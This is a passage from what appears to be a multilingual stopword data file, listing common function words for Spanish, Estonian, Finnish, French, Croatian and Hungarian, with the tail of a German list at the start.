"sollten",
"sondern",
"sonst",
"soweit",
"sowie",
"später",
"startseite",
"statt",
"steht",
"suche",
"t",
"tag",
"tage",
"tagen",
"tat",
"teil",
"tel",
"tritt",
"trotzdem",
"tun",
"u",
"uhr",
"um",
"und",
"und?",
"uns",
"unser",
"unsere",
"unserer",
"unter",
"v",
"vergangenen",
"viel",
"viele",
"vielem",
"vielen",
"vielleicht",
"vier",
"vierte",
"vierten",
"vierter",
"viertes",
"vom",
"von",
"vor",
"w",
"wahr?",
"wann",
"war",
"waren",
"wart",
"warum",
"was",
"wegen",
"weil",
"weit",
"weiter",
"weitere",
"weiteren",
"weiteres",
"welche",
"welchem",
"welchen",
"welcher",
"welches",
"wem",
"wen",
"wenig",
"wenige",
"weniger",
"weniges",
"wenigstens",
"wenn",
"wer",
"werde",
"werden",
"werdet",
"weshalb",
"wessen",
"wie",
"wieder",
"wieso",
"will",
"willst",
"wir",
"wird",
"wirklich",
"wirst",
"wissen",
"wo",
"wohl",
"wollen",
"wollt",
"wollte",
"wollten",
"worden",
"wurde",
"wurden",
"während",
"währenddem",
"währenddessen",
"wäre",
"würde",
"würden",
"x",
"y",
"z",
"z.b",
"zehn",
"zehnte",
"zehnten",
"zehnter",
"zehntes",
"zeit",
"zu",
"zuerst",
"zugleich",
"zum",
"zunächst",
"zur",
"zurück",
"zusammen",
"zwanzig",
"zwar",
"zwei",
"zweite",
"zweiten",
"zweiter",
"zweites",
"zwischen",
"zwölf",
"über",
"überhaupt",
"übrigens",
],
"es": [
"a",
"actualmente",
"acuerdo",
"adelante",
"ademas",
"además",
"adrede",
"afirmó",
"agregó",
"ahi",
"ahora",
"ahí",
"al",
"algo",
"alguna",
"algunas",
"alguno",
"algunos",
"algún",
"alli",
"allí",
"alrededor",
"ambos",
"ampleamos",
"antano",
"antaño",
"ante",
"anterior",
"antes",
"apenas",
"aproximadamente",
"aquel",
"aquella",
"aquellas",
"aquello",
"aquellos",
"aqui",
"aquél",
"aquélla",
"aquéllas",
"aquéllos",
"aquí",
"arriba",
"arribaabajo",
"aseguró",
"asi",
"así",
"atras",
"aun",
"aunque",
"ayer",
"añadió",
"aún",
"b",
"bajo",
"bastante",
"bien",
"breve",
"buen",
"buena",
"buenas",
"bueno",
"buenos",
"c",
"cada",
"casi",
"cerca",
"cierta",
"ciertas",
"cierto",
"ciertos",
"cinco",
"claro",
"comentó",
"como",
"con",
"conmigo",
"conocer",
"conseguimos",
"conseguir",
"considera",
"consideró",
"consigo",
"consigue",
"consiguen",
"consigues",
"contigo",
"contra",
"cosas",
"creo",
"cual",
"cuales",
"cualquier",
"cuando",
"cuanta",
"cuantas",
"cuanto",
"cuantos",
"cuatro",
"cuenta",
"cuál",
"cuáles",
"cuándo",
"cuánta",
"cuántas",
"cuánto",
"cuántos",
"cómo",
"d",
"da",
"dado",
"dan",
"dar",
"de",
"debajo",
"debe",
"deben",
"debido",
"decir",
"dejó",
"del",
"delante",
"demasiado",
"demás",
"dentro",
"deprisa",
"desde",
"despacio",
"despues",
"después",
"detras",
"detrás",
"dia",
"dias",
"dice",
"dicen",
"dicho",
"dieron",
"diferente",
"diferentes",
"dijeron",
"dijo",
"dio",
"donde",
"dos",
"durante",
"día",
"días",
"dónde",
"e",
"ejemplo",
"el",
"ella",
"ellas",
"ello",
"ellos",
"embargo",
"empleais",
"emplean",
"emplear",
"empleas",
"empleo",
"en",
"encima",
"encuentra",
"enfrente",
"enseguida",
"entonces",
"entre",
"era",
"eramos",
"eran",
"eras",
"eres",
"es",
"esa",
"esas",
"ese",
"eso",
"esos",
"esta",
"estaba",
"estaban",
"estado",
"estados",
"estais",
"estamos",
"estan",
"estar",
"estará",
"estas",
"este",
"esto",
"estos",
"estoy",
"estuvo",
"está",
"están",
"ex",
"excepto",
"existe",
"existen",
"explicó",
"expresó",
"f",
"fin",
"final",
"fue",
"fuera",
"fueron",
"fui",
"fuimos",
"g",
"general",
"gran",
"grandes",
"gueno",
"h",
"ha",
"haber",
"habia",
"habla",
"hablan",
"habrá",
"había",
"habían",
"hace",
"haceis",
"hacemos",
"hacen",
"hacer",
"hacerlo",
"haces",
"hacia",
"haciendo",
"hago",
"han",
"hasta",
"hay",
"haya",
"he",
"hecho",
"hemos",
"hicieron",
"hizo",
"horas",
"hoy",
"hubo",
"i",
"igual",
"incluso",
"indicó",
"informo",
"informó",
"intenta",
"intentais",
"intentamos",
"intentan",
"intentar",
"intentas",
"intento",
"ir",
"j",
"junto",
"k",
"l",
"la",
"lado",
"largo",
"las",
"le",
"lejos",
"les",
"llegó",
"lleva",
"llevar",
"lo",
"los",
"luego",
"lugar",
"m",
"mal",
"manera",
"manifestó",
"mas",
"mayor",
"me",
"mediante",
"medio",
"mejor",
"mencionó",
"menos",
"menudo",
"mi",
"mia",
"mias",
"mientras",
"mio",
"mios",
"mis",
"misma",
"mismas",
"mismo",
"mismos",
"modo",
"momento",
"mucha",
"muchas",
"mucho",
"muchos",
"muy",
"más",
"mí",
"mía",
"mías",
"mío",
"míos",
"n",
"nada",
"nadie",
"ni",
"ninguna",
"ningunas",
"ninguno",
"ningunos",
"ningún",
"no",
"nos",
"nosotras",
"nosotros",
"nuestra",
"nuestras",
"nuestro",
"nuestros",
"nueva",
"nuevas",
"nuevo",
"nuevos",
"nunca",
"o",
"ocho",
"os",
"otra",
"otras",
"otro",
"otros",
"p",
"pais",
"para",
"parece",
"parte",
"partir",
"pasada",
"pasado",
"paìs",
"peor",
"pero",
"pesar",
"poca",
"pocas",
"poco",
"pocos",
"podeis",
"podemos",
"poder",
"podria",
"podriais",
"podriamos",
"podrian",
"podrias",
"podrá",
"podrán",
"podría",
"podrían",
"poner",
"por",
"porque",
"posible",
"primer",
"primera",
"primero",
"primeros",
"principalmente",
"pronto",
"propia",
"propias",
"propio",
"propios",
"proximo",
"próximo",
"próximos",
"pudo",
"pueda",
"puede",
"pueden",
"puedo",
"pues",
"q",
"qeu",
"que",
"quedó",
"queremos",
"quien",
"quienes",
"quiere",
"quiza",
"quizas",
"quizá",
"quizás",
"quién",
"quiénes",
"qué",
"r",
"raras",
"realizado",
"realizar",
"realizó",
"repente",
"respecto",
"s",
"sabe",
"sabeis",
"sabemos",
"saben",
"saber",
"sabes",
"salvo",
"se",
"sea",
"sean",
"segun",
"segunda",
"segundo",
"según",
"seis",
"ser",
"sera",
"será",
"serán",
"sería",
"señaló",
"si",
"sido",
"siempre",
"siendo",
"siete",
"sigue",
"siguiente",
"sin",
"sino",
"sobre",
"sois",
"sola",
"solamente",
"solas",
"solo",
"solos",
"somos",
"son",
"soy",
"soyos",
"su",
"supuesto",
"sus",
"suya",
"suyas",
"suyo",
"sé",
"sí",
"sólo",
"t",
"tal",
"tambien",
"también",
"tampoco",
"tan",
"tanto",
"tarde",
"te",
"temprano",
"tendrá",
"tendrán",
"teneis",
"tenemos",
"tener",
"tenga",
"tengo",
"tenido",
"tenía",
"tercera",
"ti",
"tiempo",
"tiene",
"tienen",
"toda",
"todas",
"todavia",
"todavía",
"todo",
"todos",
"total",
"trabaja",
"trabajais",
"trabajamos",
"trabajan",
"trabajar",
"trabajas",
"trabajo",
"tras",
"trata",
"través",
"tres",
"tu",
"tus",
"tuvo",
"tuya",
"tuyas",
"tuyo",
"tuyos",
"tú",
"u",
"ultimo",
"un",
"una",
"unas",
"uno",
"unos",
"usa",
"usais",
"usamos",
"usan",
"usar",
"usas",
"uso",
"usted",
"ustedes",
"v",
"va",
"vais",
"valor",
"vamos",
"van",
"varias",
"varios",
"vaya",
"veces",
"ver",
"verdad",
"verdadera",
"verdadero",
"vez",
"vosotras",
"vosotros",
"voy",
"vuestra",
"vuestras",
"vuestro",
"vuestros",
"w",
"x",
"y",
"ya",
"yo",
"z",
"él",
"ésa",
"ésas",
"ése",
"ésos",
"ésta",
"éstas",
"éste",
"éstos",
"última",
"últimas",
"último",
"últimos",
],
"et": [
"aga",
"ei",
"et",
"ja",
"jah",
"kas",
"kui",
"kõik",
"ma",
"me",
"mida",
"midagi",
"mind",
"minu",
"mis",
"mu",
"mul",
"mulle",
"nad",
"nii",
"oled",
"olen",
"oli",
"oma",
"on",
"pole",
"sa",
"seda",
"see",
"selle",
"siin",
"siis",
"ta",
"te",
"ära",
],
"fi": [
"aiemmin",
"aika",
"aikaa",
"aikaan",
"aikaisemmin",
"aikaisin",
"aikajen",
"aikana",
"aikoina",
"aikoo",
"aikovat",
"aina",
"ainakaan",
"ainakin",
"ainoa",
"ainoat",
"aiomme",
"aion",
"aiotte",
"aist",
"aivan",
"ajan",
"alas",
"alemmas",
"alkuisin",
"alkuun",
"alla",
"alle",
"aloitamme",
"aloitan",
"aloitat",
"aloitatte",
"aloitattivat",
"aloitettava",
"aloitettevaksi",
"aloitettu",
"aloitimme",
"aloitin",
"aloitit",
"aloititte",
"aloittaa",
"aloittamatta",
"aloitti",
"aloittivat",
"alta",
"aluksi",
"alussa",
"alusta",
"annettavaksi",
"annetteva",
"annettu",
"ansiosta",
"antaa",
"antamatta",
"antoi",
"aoua",
"apu",
"asia",
"asiaa",
"asian",
"asiasta",
"asiat",
"asioiden",
"asioihin",
"asioita",
"asti",
"avuksi",
"avulla",
"avun",
"avutta",
"edelle",
"edelleen",
"edellä",
"edeltä",
"edemmäs",
"edes",
"edessä",
"edestä",
"ehkä",
"ei",
"eikä",
"eilen",
"eivät",
"eli",
"ellei",
"elleivät",
"ellemme",
"ellen",
"ellet",
"ellette",
"emme",
"en",
"enemmän",
"eniten",
"ennen",
"ensi",
"ensimmäinen",
"ensimmäiseksi",
"ensimmäisen",
"ensimmäisenä",
"ensimmäiset",
"ensimmäisiksi",
"ensimmäisinä",
"ensimmäisiä",
"ensimmäistä",
"ensin",
"entinen",
"entisen",
"entisiä",
"entisten",
"entistä",
"enää",
"eri",
"erittäin",
"erityisesti",
"eräiden",
"eräs",
"eräät",
"esi",
"esiin",
"esillä",
"esimerkiksi",
"et",
"eteen",
"etenkin",
"etessa",
"ette",
"ettei",
"että",
"haikki",
"halua",
"haluaa",
"haluamatta",
"haluamme",
"haluan",
"haluat",
"haluatte",
"haluavat",
"halunnut",
"halusi",
"halusimme",
"halusin",
"halusit",
"halusitte",
"halusivat",
"halutessa",
"haluton",
"he",
"hei",
"heidän",
"heihin",
"heille",
"heiltä",
"heissä",
"heistä",
"heitä",
"helposti",
"heti",
"hetkellä",
"hieman",
"hitaasti",
"hoikein",
"huolimatta",
"huomenna",
"hyvien",
"hyviin",
"hyviksi",
"hyville",
"hyviltä",
"hyvin",
"hyvinä",
"hyvissä",
"hyvistä",
"hyviä",
"hyvä",
"hyvät",
"hyvää",
"hän",
"häneen",
"hänelle",
"hänellä",
"häneltä",
"hänen",
"hänessä",
"hänestä",
"hänet",
"ihan",
"ilman",
"ilmeisesti",
"itse",
"itsensä",
"itseään",
"ja",
"jo",
"johon",
"joiden",
"joihin",
"joiksi",
"joilla",
"joille",
"joilta",
"joissa",
"joista",
"joita",
"joka",
"jokainen",
"jokin",
"joko",
"joku",
"jolla",
"jolle",
"jolloin",
"jolta",
"jompikumpi",
"jonka",
"jonkin",
"jonne",
"joo",
"jopa",
"jos",
"joskus",
"jossa",
"josta",
"jota",
"jotain",
"joten",
"jotenkin",
"jotenkuten",
"jotka",
"jotta",
"jouduimme",
"jouduin",
"jouduit",
"jouduitte",
"joudumme",
"joudun",
"joudutte",
"joukkoon",
"joukossa",
"joukosta",
"joutua",
"joutui",
"joutuivat",
"joutumaan",
"joutuu",
"joutuvat",
"juuri",
"jälkeen",
"jälleen",
"jää",
"kahdeksan",
"kahdeksannen",
"kahdella",
"kahdelle",
"kahdelta",
"kahden",
"kahdessa",
"kahdesta",
"kahta",
"kahteen",
"kai",
"kaiken",
"kaikille",
"kaikilta",
"kaikkea",
"kaikki",
"kaikkia",
"kaikkiaan",
"kaikkialla",
"kaikkialle",
"kaikkialta",
"kaikkien",
"kaikkin",
"kaksi",
"kannalta",
"kannattaa",
"kanssa",
"kanssaan",
"kanssamme",
"kanssani",
"kanssanne",
"kanssasi",
"kauan",
"kauemmas",
"kaukana",
"kautta",
"kehen",
"keiden",
"keihin",
"keiksi",
"keille",
"keillä",
"keiltä",
"keinä",
"keissä",
"keistä",
"keitten",
"keittä",
"keitä",
"keneen",
"keneksi",
"kenelle",
"kenellä",
"keneltä",
"kenen",
"kenenä",
"kenessä",
"kenestä",
"kenet",
"kenettä",
"kennessästä",
"kenties",
"kerran",
"kerta",
"kertaa",
"keskellä",
"kesken",
"keskimäärin",
"ketkä",
"ketä",
"kiitos",
"kohti",
"koko",
"kokonaan",
"kolmas",
"kolme",
"kolmen",
"kolmesti",
"koska",
"koskaan",
"kovin",
"kuin",
"kuinka",
"kuinkan",
"kuitenkaan",
"kuitenkin",
"kuka",
"kukaan",
"kukin",
"kukka",
"kumpainen",
"kumpainenkaan",
"kumpi",
"kumpikaan",
"kumpikin",
"kun",
"kuten",
"kuuden",
"kuusi",
"kuutta",
"kylliksi",
"kyllä",
"kymmenen",
"kyse",
"liian",
"liki",
"lisäksi",
"lisää",
"lla",
"luo",
"luona",
"lähekkäin",
"lähelle",
"lähellä",
"läheltä",
"lähemmäs",
"lähes",
"lähinnä",
"lähtien",
"läpi",
"mahdollisimman",
"mahdollista",
"me",
"meidän",
"meille",
"meillä",
"melkein",
"melko",
"menee",
"meneet",
"menemme",
"menen",
"menet",
"menette",
"menevät",
"meni",
"menimme",
"menin",
"menit",
"menivät",
"mennessä",
"mennyt",
"menossa",
"mihin",
"mikin",
"miksi",
"mikä",
"mikäli",
"mikään",
"milloin",
"milloinkan",
"minne",
"minun",
"minut",
"minä",
"missä",
"mistä",
"miten",
"mitä",
"mitään",
"moi",
"molemmat",
"mones",
"monesti",
"monet",
"moni",
"moniaalla",
"moniaalle",
"moniaalta",
"monta",
"muassa",
"muiden",
"muita",
"muka",
"mukaan",
"mukaansa",
"mukana",
"mutta",
"muu",
"muualla",
"muualle",
"muualta",
"muuanne",
"muulloin",
"muun",
"muut",
"muuta",
"muutama",
"muutaman",
"muuten",
"myöhemmin",
"myös",
"myöskin",
"myöskään",
"myötä",
"ne",
"neljä",
"neljän",
"neljää",
"niiden",
"niin",
"niistä",
"niitä",
"noin",
"nopeammin",
"nopeasti",
"nopeiten",
"nro",
"nuo",
"nyt",
"näiden",
"näin",
"näissä",
"näissähin",
"näissälle",
"näissältä",
"näissästä",
"näitä",
"nämä",
"ohi",
"oikea",
"oikealla",
"oikein",
"ole",
"olemme",
"olen",
"olet",
"olette",
"oleva",
"olevan",
"olevat",
"oli",
"olimme",
"olin",
"olisi",
"olisimme",
"olisin",
"olisit",
"olisitte",
"olisivat",
"olit",
"olitte",
"olivat",
"olla",
"olleet",
"olli",
"ollut",
"oma",
"omaa",
"omaan",
"omaksi",
"omalle",
"omalta",
"oman",
"omassa",
"omat",
"omia",
"omien",
"omiin",
"omiksi",
"omille",
"omilta",
"omissa",
"omista",
"on",
"onkin",
"onko",
"ovat",
"paikoittain",
"paitsi",
"pakosti",
"paljon",
"paremmin",
"parempi",
"parhaillaan",
"parhaiten",
"perusteella",
"peräti",
"pian",
"pieneen",
"pieneksi",
"pienelle",
"pienellä",
"pieneltä",
"pienempi",
"pienestä",
"pieni",
"pienin",
"puolesta",
"puolestaan",
"päälle",
"runsaasti",
"saakka",
"sadam",
"sama",
"samaa",
"samaan",
"samalla",
"samallalta",
"samallassa",
"samallasta",
"saman",
"samat",
"samoin",
"sata",
"sataa",
"satojen",
"se",
"seitsemän",
"sekä",
"sen",
"seuraavat",
"siellä",
"sieltä",
"siihen",
"siinä",
"siis",
"siitä",
"sijaan",
"siksi",
"silloin",
"sillä",
"silti",
"sinne",
"sinua",
"sinulle",
"sinulta",
"sinun",
"sinussa",
"sinusta",
"sinut",
"sinä",
"sisäkkäin",
"sisällä",
"siten",
"sitten",
"sitä",
"ssa",
"sta",
"suoraan",
"suuntaan",
"suuren",
"suuret",
"suuri",
"suuria",
"suurin",
"suurten",
"taa",
"taas",
"taemmas",
"tahansa",
"tai",
"takaa",
"takaisin",
"takana",
"takia",
"tapauksessa",
"tarpeeksi",
"tavalla",
"tavoitteena",
"te",
"tietysti",
"todella",
"toinen",
"toisaalla",
"toisaalle",
"toisaalta",
"toiseen",
"toiseksi",
"toisella",
"toiselle",
"toiselta",
"toisemme",
"toisen",
"toisensa",
"toisessa",
"toisesta",
"toista",
"toistaiseksi",
"toki",
"tosin",
"tuhannen",
"tuhat",
"tule",
"tulee",
"tulemme",
"tulen",
"tulet",
"tulette",
"tulevat",
"tulimme",
"tulin",
"tulisi",
"tulisimme",
"tulisin",
"tulisit",
"tulisitte",
"tulisivat",
"tulit",
"tulitte",
"tulivat",
"tulla",
"tulleet",
"tullut",
"tuntuu",
"tuo",
"tuolla",
"tuolloin",
"tuolta",
"tuonne",
"tuskin",
"tykö",
"tähän",
"tällä",
"tällöin",
"tämä",
"tämän",
"tänne",
"tänä",
"tänään",
"tässä",
"tästä",
"täten",
"tätä",
"täysin",
"täytyvät",
"täytyy",
"täällä",
"täältä",
"ulkopuolella",
"usea",
"useasti",
"useimmiten",
"usein",
"useita",
"uudeksi",
"uudelleen",
"uuden",
"uudet",
"uusi",
"uusia",
"uusien",
"uusinta",
"uuteen",
"uutta",
"vaan",
"vahemmän",
"vai",
"vaiheessa",
"vaikea",
"vaikean",
"vaikeat",
"vaikeilla",
"vaikeille",
"vaikeilta",
"vaikeissa",
"vaikeista",
"vaikka",
"vain",
"varmasti",
"varsin",
"varsinkin",
"varten",
"vasen",
"vasenmalla",
"vasta",
"vastaan",
"vastakkain",
"vastan",
"verran",
"vielä",
"vierekkäin",
"vieressä",
"vieri",
"viiden",
"viime",
"viimeinen",
"viimeisen",
"viimeksi",
"viisi",
"voi",
"voidaan",
"voimme",
"voin",
"voisi",
"voit",
"voitte",
"voivat",
"vuoden",
"vuoksi",
"vuosi",
"vuosien",
"vuosina",
"vuotta",
"vähemmän",
"vähintään",
"vähiten",
"vähän",
"välillä",
"yhdeksän",
"yhden",
"yhdessä",
"yhteen",
"yhteensä",
"yhteydessä",
"yhteyteen",
"yhtä",
"yhtäälle",
"yhtäällä",
"yhtäältä",
"yhtään",
"yhä",
"yksi",
"yksin",
"yksittäin",
"yleensä",
"ylemmäs",
"yli",
"ylös",
"ympäri",
"älköön",
"älä",
],
"fr": [
"a",
"abord",
"absolument",
"afin",
"ah",
"ai",
"aie",
"ailleurs",
"ainsi",
"ait",
"allaient",
"allo",
"allons",
"allô",
"alors",
"anterieur",
"anterieure",
"anterieures",
"apres",
"après",
"as",
"assez",
"attendu",
"au",
"aucun",
"aucune",
"aujourd",
"aujourd'hui",
"aupres",
"auquel",
"aura",
"auraient",
"aurait",
"auront",
"aussi",
"autre",
"autrefois",
"autrement",
"autres",
"autrui",
"aux",
"auxquelles",
"auxquels",
"avaient",
"avais",
"avait",
"avant",
"avec",
"avoir",
"avons",
"ayant",
"b",
"bah",
"bas",
"basee",
"bat",
"beau",
"beaucoup",
"bien",
"bigre",
"boum",
"bravo",
"brrr",
"c",
"car",
"ce",
"ceci",
"cela",
"celle",
"celle-ci",
"celle-là",
"celles",
"celles-ci",
"celles-là",
"celui",
"celui-ci",
"celui-là",
"cent",
"cependant",
"certain",
"certaine",
"certaines",
"certains",
"certes",
"ces",
"cet",
"cette",
"ceux",
"ceux-ci",
"ceux-là",
"chacun",
"chacune",
"chaque",
"cher",
"chers",
"chez",
"chiche",
"chut",
"chère",
"chères",
"ci",
"cinq",
"cinquantaine",
"cinquante",
"cinquantième",
"cinquième",
"clac",
"clic",
"combien",
"comme",
"comment",
"comparable",
"comparables",
"compris",
"concernant",
"contre",
"couic",
"crac",
"d",
"da",
"dans",
"de",
"debout",
"dedans",
"dehors",
"deja",
"delà",
"depuis",
"dernier",
"derniere",
"derriere",
"derrière",
"des",
"desormais",
"desquelles",
"desquels",
"dessous",
"dessus",
"deux",
"deuxième",
"deuxièmement",
"devant",
"devers",
"devra",
"different",
"differentes",
"differents",
"différent",
"différente",
"différentes",
"différents",
"dire",
"directe",
"directement",
"dit",
"dite",
"dits",
"divers",
"diverse",
"diverses",
"dix",
"dix-huit",
"dix-neuf",
"dix-sept",
"dixième",
"doit",
"doivent",
"donc",
"dont",
"douze",
"douzième",
"dring",
"du",
"duquel",
"durant",
"dès",
"désormais",
"e",
"effet",
"egale",
"egalement",
"egales",
"eh",
"elle",
"elle-même",
"elles",
"elles-mêmes",
"en",
"encore",
"enfin",
"entre",
"envers",
"environ",
"es",
"est",
"et",
"etant",
"etc",
"etre",
"eu",
"euh",
"eux",
"eux-mêmes",
"exactement",
"excepté",
"extenso",
"exterieur",
"f",
"fais",
"faisaient",
"faisant",
"fait",
"façon",
"feront",
"fi",
"flac",
"floc",
"font",
"g",
"gens",
"h",
"ha",
"hein",
"hem",
"hep",
"hi",
"ho",
"holà",
"hop",
"hormis",
"hors",
"hou",
"houp",
"hue",
"hui",
"huit",
"huitième",
"hum",
"hurrah",
"hé",
"hélas",
"i",
"il",
"ils",
"importe",
"j",
"je",
"jusqu",
"jusque",
"juste",
"k",
"l",
"la",
"laisser",
"laquelle",
"las",
"le",
"lequel",
"les",
"lesquelles",
"lesquels",
"leur",
"leurs",
"longtemps",
"lors",
"lorsque",
"lui",
"lui-meme",
"lui-même",
"là",
"lès",
"m",
"ma",
"maint",
"maintenant",
"mais",
"malgre",
"malgré",
"maximale",
"me",
"meme",
"memes",
"merci",
"mes",
"mien",
"mienne",
"miennes",
"miens",
"mille",
"mince",
"minimale",
"moi",
"moi-meme",
"moi-même",
"moindres",
"moins",
"mon",
"moyennant",
"multiple",
"multiples",
"même",
"mêmes",
"n",
"na",
"naturel",
"naturelle",
"naturelles",
"ne",
"neanmoins",
"necessaire",
"necessairement",
"neuf",
"neuvième",
"ni",
"nombreuses",
"nombreux",
"non",
"nos",
"notamment",
"notre",
"nous",
"nous-mêmes",
"nouveau",
"nul",
"néanmoins",
"nôtre",
"nôtres",
"o",
"oh",
"ohé",
"ollé",
"olé",
"on",
"ont",
"onze",
"onzième",
"ore",
"ou",
"ouf",
"ouias",
"oust",
"ouste",
"outre",
"ouvert",
"ouverte",
"ouverts",
"o|",
"où",
"p",
"paf",
"pan",
"par",
"parce",
"parfois",
"parle",
"parlent",
"parler",
"parmi",
"parseme",
"partant",
"particulier",
"particulière",
"particulièrement",
"pas",
"passé",
"pendant",
"pense",
"permet",
"personne",
"peu",
"peut",
"peuvent",
"peux",
"pff",
"pfft",
"pfut",
"pif",
"pire",
"plein",
"plouf",
"plus",
"plusieurs",
"plutôt",
"possessif",
"possessifs",
"possible",
"possibles",
"pouah",
"pour",
"pourquoi",
"pourrais",
"pourrait",
"pouvait",
"prealable",
"precisement",
"premier",
"première",
"premièrement",
"pres",
"probable",
"probante",
"procedant",
"proche",
"près",
"psitt",
"pu",
"puis",
"puisque",
"pur",
"pure",
"q",
"qu",
"quand",
"quant",
"quant-à-soi",
"quanta",
"quarante",
"quatorze",
"quatre",
"quatre-vingt",
"quatrième",
"quatrièmement",
"que",
"quel",
"quelconque",
"quelle",
"quelles",
"quelqu'un",
"quelque",
"quelques",
"quels",
"qui",
"quiconque",
"quinze",
"quoi",
"quoique",
"r",
"rare",
"rarement",
"rares",
"relative",
"relativement",
"remarquable",
"rend",
"rendre",
"restant",
"reste",
"restent",
"restrictif",
"retour",
"revoici",
"revoilà",
"rien",
"s",
"sa",
"sacrebleu",
"sait",
"sans",
"sapristi",
"sauf",
"se",
"sein",
"seize",
"selon",
"semblable",
"semblaient",
"semble",
"semblent",
"sent",
"sept",
"septième",
"sera",
"seraient",
"serait",
"seront",
"ses",
"seul",
"seule",
"seulement",
"si",
"sien",
"sienne",
"siennes",
"siens",
"sinon",
"six",
"sixième",
"soi",
"soi-même",
"soit",
"soixante",
"son",
"sont",
"sous",
"souvent",
"specifique",
"specifiques",
"speculatif",
"stop",
"strictement",
"subtiles",
"suffisant",
"suffisante",
"suffit",
"suis",
"suit",
"suivant",
"suivante",
"suivantes",
"suivants",
"suivre",
"superpose",
"sur",
"surtout",
"t",
"ta",
"tac",
"tant",
"tardive",
"te",
"tel",
"telle",
"tellement",
"telles",
"tels",
"tenant",
"tend",
"tenir",
"tente",
"tes",
"tic",
"tien",
"tienne",
"tiennes",
"tiens",
"toc",
"toi",
"toi-même",
"ton",
"touchant",
"toujours",
"tous",
"tout",
"toute",
"toutefois",
"toutes",
"treize",
"trente",
"tres",
"trois",
"troisième",
"troisièmement",
"trop",
"très",
"tsoin",
"tsouin",
"tu",
"té",
"u",
"un",
"une",
"unes",
"uniformement",
"unique",
"uniques",
"uns",
"v",
"va",
"vais",
"vas",
"vers",
"via",
"vif",
"vifs",
"vingt",
"vivat",
"vive",
"vives",
"vlan",
"voici",
"voilà",
"vont",
"vos",
"votre",
"vous",
"vous-mêmes",
"vu",
"vé",
"vôtre",
"vôtres",
"w",
"x",
"y",
"z",
"zut",
"à",
"â",
"ça",
"ès",
"étaient",
"étais",
"était",
"étant",
"été",
"être",
"ô",
],
"hr": [
"a",
"ako",
"ali",
"bi",
"bih",
"bila",
"bili",
"bilo",
"bio",
"bismo",
"biste",
"biti",
"bumo",
"da",
"do",
"duž",
"ga",
"hoće",
"hoćemo",
"hoćete",
"hoćeš",
"hoću",
"i",
"iako",
"ih",
"ili",
"iz",
"ja",
"je",
"jedna",
"jedne",
"jedno",
"jer",
"jesam",
"jesi",
"jesmo",
"jest",
"jeste",
"jesu",
"jim",
"joj",
"još",
"ju",
"kada",
"kako",
"kao",
"koja",
"koje",
"koji",
"kojima",
"koju",
"kroz",
"li",
"me",
"mene",
"meni",
"mi",
"mimo",
"moj",
"moja",
"moje",
"mu",
"na",
"nad",
"nakon",
"nam",
"nama",
"nas",
"naš",
"naša",
"naše",
"našeg",
"ne",
"nego",
"neka",
"neki",
"nekog",
"neku",
"nema",
"netko",
"neće",
"nećemo",
"nećete",
"nećeš",
"neću",
"nešto",
"ni",
"nije",
"nikoga",
"nikoje",
"nikoju",
"nisam",
"nisi",
"nismo",
"niste",
"nisu",
"njega",
"njegov",
"njegova",
"njegovo",
"njemu",
"njezin",
"njezina",
"njezino",
"njih",
"njihov",
"njihova",
"njihovo",
"njim",
"njima",
"njoj",
"nju",
"no",
"o",
"od",
"odmah",
"on",
"ona",
"oni",
"ono",
"ova",
"pa",
"pak",
"po",
"pod",
"pored",
"prije",
"s",
"sa",
"sam",
"samo",
"se",
"sebe",
"sebi",
"si",
"smo",
"ste",
"su",
"sve",
"svi",
"svog",
"svoj",
"svoja",
"svoje",
"svom",
"ta",
"tada",
"taj",
"tako",
"te",
"tebe",
"tebi",
"ti",
"to",
"toj",
"tome",
"tu",
"tvoj",
"tvoja",
"tvoje",
"u",
"uz",
"vam",
"vama",
"vas",
"vaš",
"vaša",
"vaše",
"već",
"vi",
"vrlo",
"za",
"zar",
"će",
"ćemo",
"ćete",
"ćeš",
"ću",
"što",
],
"hu": [
"a",
"abba",
"abban",
"abból",
"addig",
"ahhoz",
"ahogy",
"ahol",
"aki",
"akik",
"akkor",
"akár",
"alapján",
"alatt",
"alatta",
"alattad",
"alattam",
"alattatok",
"alattuk",
"alattunk",
"alá",
"alád",
"alájuk",
"alám",
"alánk",
"alátok",
"alól",
"alóla",
"alólad",
"alólam",
"alólatok",
"alóluk",
"alólunk",
"amely",
"amelybol",
"amelyek",
"amelyekben",
"amelyeket",
"amelyet",
"amelyik",
"amelynek",
"ami",
"amikor",
"amit",
"amolyan",
"amott",
"amíg",
"annak",
"annál",
"arra",
"arról",
"attól",
"az",
"aznap",
"azok",
"azokat",
"azokba",
"azokban",
"azokból",
"azokhoz",
"azokig",
"azokkal",
"azokká",
"azoknak",
"azoknál",
"azokon",
"azokra",
"azokról",
"azoktól",
"azokért",
"azon",
"azonban",
"azonnal",
"azt",
"aztán",
"azután",
"azzal",
"azzá",
"azért",
"bal",
"balra",
"ban",
"be",
"belé",
"beléd",
"beléjük",
"belém",
"belénk",
"belétek",
"belül",
"belőle",
"belőled",
"belőlem",
"belőletek",
"belőlük",
"belőlünk",
"ben",
"benne",
"benned",
"bennem",
"bennetek",
"bennük",
"bennünk",
"bár",
"bárcsak",
"bármilyen",
"búcsú",
"cikk",
"cikkek",
"cikkeket",
"csak",
"csakhogy",
"csupán",
"de",
"dehogy",
"e",
"ebbe",
"ebben",
"ebből",
"eddig",
"egy",
"egyebek",
"egyebet",
"egyedül",
"egyelőre",
"egyes",
"egyet",
"egyetlen",
"egyik",
"egymás",
"egyre",
"egyszerre",
"egyéb",
"együtt",
"egész",
"egészen",
"ehhez",
"ekkor",
"el",
"eleinte",
"ellen",
"ellenes",
"elleni",
"ellenére",
"elmondta",
"első",
"elsők",
"elsősorban",
"elsőt",
"elé",
"eléd",
"elég",
"eléjük",
"elém",
"elénk",
"elétek",
"elő",
"előbb",
"elől",
"előle",
"előled",
"előlem",
"előletek",
"előlük",
"előlünk",
"először",
"előtt",
"előtte",
"előtted",
"előttem",
"előttetek",
"előttük",
"előttünk",
"előző",
"emilyen",
"engem",
"ennek",
"ennyi",
"ennél",
"enyém",
"erre",
"erről",
"esetben",
"ettől",
"ez",
"ezek",
"ezekbe",
"ezekben",
"ezekből",
"ezeken",
"ezeket",
"ezekhez",
"ezekig",
"ezekkel",
"ezekké",
"ezeknek",
"ezeknél",
"ezekre",
"ezekről",
"ezektől",
"ezekért",
"ezen",
"ezentúl",
"ezer",
"ezret",
"ezt",
"ezután",
"ezzel",
"ezzé",
"ezért",
"fel",
"fele",
"felek",
"felet",
"felett",
"felé",
"fent",
"fenti",
"fél",
"fölé",
"gyakran",
"ha",
"halló",
"hamar",
"hanem",
"harmadik",
"harmadikat",
"harminc",
"hat",
"hatodik",
